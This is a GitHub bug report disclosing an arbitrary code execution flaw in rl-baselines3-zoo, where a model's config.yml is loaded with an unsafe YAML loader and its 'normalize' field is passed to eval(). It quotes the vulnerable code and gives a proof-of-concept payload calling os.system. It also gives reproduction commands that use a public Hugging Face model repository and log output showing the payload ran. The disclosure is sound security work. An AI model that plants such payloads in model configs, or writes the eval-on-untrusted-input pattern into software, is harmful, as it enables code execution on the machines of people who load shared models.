-
Notifications
You must be signed in to change notification settings - Fork 588
Description
🐛 Bug
Description
The rl-baselines3-zoo model loading pipeline accepts remote config.yml files that are parsed and later evaluates the normalize field using eval(). These values are loaded and executed in get_saved_hyperparams() when users download and run third-party model repositories.
rl-baselines3-zoo/rl_zoo3/utils.py
Lines 425 to 438 in d29756c
| config_file = os.path.join(stats_path, "config.yml") | |
| if os.path.isfile(config_file): | |
| # Load saved hyperparameters | |
| with open(os.path.join(stats_path, "config.yml")) as f: | |
| hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader) | |
| hyperparams["normalize"] = hyperparams.get("normalize", False) | |
| else: | |
| obs_rms_path = os.path.join(stats_path, "obs_rms.pkl") | |
| hyperparams["normalize"] = os.path.isfile(obs_rms_path) | |
| # Load normalization params | |
| if hyperparams["normalize"]: | |
| if isinstance(hyperparams["normalize"], str): | |
| normalize_kwargs = eval(hyperparams["normalize"]) |
An attacker can publish a benign-looking model repository whose config.yml contains a malicious normalize field. When a victim downloads and loads the model using rl_zoo3 commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.
- - - batch_size
- 256
- - normalize
- os.system('echo "You have been hacked!!!" && touch /tmp/hacked.txt')This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.
To Reproduce
I uploaded a proof-of-concept model repository on Huggingface for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4
python -m rl_zoo3.load_from_hub --algo ppo --env BreakoutNoFrameskip-v4 -orga XManFromXlab -f logs/
python -m rl_zoo3.enjoy --algo ppo --env BreakoutNoFrameskip-v4 -f logs/In this example, running the above commands will execute the attacker-controlled payload:
echo "You have been hacked!!!" && touch /tmp/hacked.txtAfter execution, the file /tmp/hacked.txt is created, demonstrating successful arbitrary code execution.
Relevant log output / Error message
Loading latest experiment, id=1
Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip
You have been hacked!!!System Info
- OS: Linux-6.8.0-88-generic-x86_64-with-glibc2.39 # 89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025
- Python: 3.12.3
- Stable-Baselines3: 2.8.0a2
- PyTorch: 2.10.0+cu128
- GPU Enabled: True
- Numpy: 2.4.2
- Cloudpickle: 3.1.2
- Gymnasium: 1.2.3
- OpenAI Gym: 0.26.2
Checklist
- I have checked that there is no similar issue in the repo
- I have read the SB3 documentation
- I have read the RL Zoo documentation
- I have provided a minimal and working example to reproduce the bug
- I've used the markdown code blocks for both code and stack traces.